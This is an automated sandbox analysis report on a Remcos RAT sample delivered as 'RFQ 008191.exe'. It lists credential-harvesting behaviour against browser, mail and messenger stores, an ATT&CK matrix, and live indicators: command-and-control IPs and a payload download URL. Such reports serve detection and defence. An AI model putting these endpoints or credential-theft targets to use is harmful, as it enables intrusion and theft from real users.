              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 11_2_1F752264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_1F752264
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: 14_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,14_2_004082CD
              Source: C:\Users\user\Desktop\RFQ 008191.exeCode function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040351C
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: ESMTPPassword14_2_004033F0
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword14_2_00402DB3
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword14_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Juryen.exe PID: 8032, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Users\user\AppData\Local\Temp\Juryen.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HSAM04Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000B.00000002.2512739628.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Juryen.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		2
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Command and Scripting Interpreter              		Logon Script (Windows)412
              Process Injection              		2
              Software Packing              		2
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              DLL Side-Loading              		1
              Credentials In Files              		129
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets241
              Security Software Discovery              		SSH2
              Clipboard Data              		2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
              Virtualization/Sandbox Evasion              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture112
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job412
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1572498 Sample: RFQ 008191.exe Startdate: 10/12/2024 Architecture: WINDOWS Score: 100 42 geoplugin.net 2->42 52 Suricata IDS alerts for network traffic 2->52 54 Found malware configuration 2->54 56 Multi AV Scanner detection for submitted file 2->56 58 10 other signatures 2->58 9 RFQ 008191.exe 23 2->9         started        signatures3 process4 signatures5 66 Suspicious powershell command line found 9->66 12 powershell.exe 29 9->12         started        process6 file7 32 C:\Users\user\AppData\Local\Temp\Juryen.exe, PE32 12->32 dropped 34 C:\Users\user\...\Juryen.exe:Zone.Identifier, ASCII 12->34 dropped 68 Early bird code injection technique detected 12->68 70 Writes to foreign memory regions 12->70 72 Found suspicious powershell code related to unpacking or dynamic code loading 12->72 74 3 other signatures 12->74 16 Juryen.exe 3 15 12->16         started        21 conhost.exe 12->21         started        signatures8 process9 dnsIp10 36 212.162.149.91, 2404, 49793, 49799 UNREAL-SERVERSUS Netherlands 16->36 38 212.162.149.89, 49784, 80 UNREAL-SERVERSUS Netherlands 16->38 40 geoplugin.net 178.237.33.50, 49801, 80 ATOM86-ASATOM86NL Netherlands 16->40 30 C:\ProgramData\remcos\logs.dat, data 16->30 dropped 44 Multi AV Scanner detection for dropped file 16->44 46 Detected unpacking (changes PE section rights) 16->46 48 Detected Remcos RAT 16->48 50 5 other signatures 16->50 23 Juryen.exe 1 16->23         started        26 Juryen.exe 1 16->26         started        28 Juryen.exe 14 16->28         started        file11 signatures12 process13 signatures14 60 Tries to steal Instant Messenger accounts or passwords 23->60 62 Tries to harvest and steal browser information (history, passwords, etc) 23->62 64 Tries to steal Mail credentials (via file / registry access) 26->64

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              RFQ 008191.exe18%ReversingLabs
              RFQ 008191.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Juryen.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\Juryen.exe18%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.imvu.comppData0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              http://212.162.149.89/wwVHOGRH148.bins0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              http://212.162.149.89/wwVHOGRH148.bin0%Avira URL Cloudsafe
              http://www.ebuddy.com0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gpfalse
                  		high
                  http://212.162.149.89/wwVHOGRH148.binfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.imvu.comrJuryen.exe, 0000000B.00000002.2542705888.000000001F720000.00000040.10000000.00040000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://geoplugin.net/json.gp&Juryen.exe, 0000000B.00000002.2528307519.0000000002EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://geoplugin.net/json.gphyJuryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.imvu.comJuryen.exe, Juryen.exe, 0000000F.00000003.1880468582.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000003.1880426183.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000002.1880775989.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/Iconpowershell.exe, 00000006.00000002.1766181326.0000000005C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://geoplugin.net/json.gpqJuryen.exe, 0000000B.00000002.2528307519.0000000002E96000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.imvu.comppDataJuryen.exe, 0000000F.00000003.1880468582.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Juryen.exe, 0000000F.00000003.1880426183.000000000079D000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.nirsoft.netJuryen.exe, 0000000D.00000002.1905221052.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorErrorRFQ 008191.exe, Juryen.exe.6.drfalse
                                            		high
                                            https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1762545128.0000000004D16000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
